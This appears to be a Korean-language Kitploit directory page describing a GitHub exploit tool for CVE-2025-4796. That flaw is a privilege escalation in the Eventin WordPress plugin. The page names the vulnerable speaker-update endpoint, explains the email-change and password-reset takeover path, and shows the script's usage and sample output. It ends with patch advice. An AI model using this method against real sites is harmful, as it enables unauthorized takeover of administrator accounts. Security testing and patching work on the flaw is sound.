Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-4796 — eventin <= 4.0.34 - 인증된 contributor+ 사용자의 이메일 변경을 통한 권한 상승 / 계정 탈취 | Kitploit
도구/GitHubGitHub/anothersec/cve-2025-4796
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubanothersec/cve-2025-4796

CVE-2025-4796

eventin <= 4.0.34 - 인증된 contributor+ 사용자의 이메일 변경을 통한 권한 상승 / 계정 탈취

저장소 보기
119개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-4796

eventin <= 4.0.34 - 인증된 기여자 이상의 사용자 이메일 변경/계정 탈취를 통한 권한 상승

설명

Eventin WordPress 플러그인(<= 4.0.34)에서 발견된 권한 상승 버그로, 기여자 이상의 사용자가 플러그인의 스피커 업데이트 API를 통해 모든 사용자의 이메일을 변경할 수 있습니다. 관리자 이메일을 공격자가 제어하는 이메일로 변경하면 비밀번호를 재설정하고 계정을 탈취할 수 있습니다.

  • 취약 부분: eventin wordpress plugin (eventin\speaker\api\speakercontroller::update_item)
  • 영향을 받는 버전: <= 4.0.34
  • cve: CVE-2025-4796
  • cvss: 8.8 (높음)

취약점 세부 정보

eventin은 업데이트를 요청하는 사용자가 누구인지 또는 사용자 이메일을 변경할 권한이 있는지 제대로 확인하지 않습니다. 기여자 이상의 사용자는 다음 엔드포인트를 호출할 수 있습니다:

  • put /wp-json/eventin/v2/speakers/<speaker_id> 그리고 스피커 이메일을 자신이 제어하는 이메일로 변경합니다. 그런 다음 공격자는 WordPress 비밀번호 재설정을 사용하여 관리자 계정을 탈취할 수 있습니다.

요구 사항:

  • Python 3.8 이상
  • requests

requests 설치: pip install requests

사용법

스크립트를 실행하고 프롬프트가 표시되면 필요한 값을 입력합니다:

python3 CVE-2025-4796.py

예제 출력

[+] SSL 인증 확인 경고 해제 중
[+] WordPress에 로그인 중.
[+] 로그인 성공.
[+] nonce 토큰 가져오는 중
[+] nonce 토큰 발견됨: abcdef1234567890
[+] 스피커 이메일 업데이트 요청

[+] 업데이트 작업 성공.

root@kitploit:~
url: http://example.com  
id: 123   
email: [email protected]. 
user: attacker  
pass: yourpassword  

{. 
  "id": 123,    
  "email": "[email protected]",  
  "name": "Speaker Name",    
  ...  
}. 

해결 방법

eventin 플러그인의 버전 4.0.35에서 패치가 릴리스되었습니다. 사이트 관리자는 즉시 이 버전으로 업데이트할 것을 강력히 권장합니다. 이 수정 사항은 SpeakerController::update_item 함수에 추가 사용자 검증 확인을 포함합니다.

도구 다운로드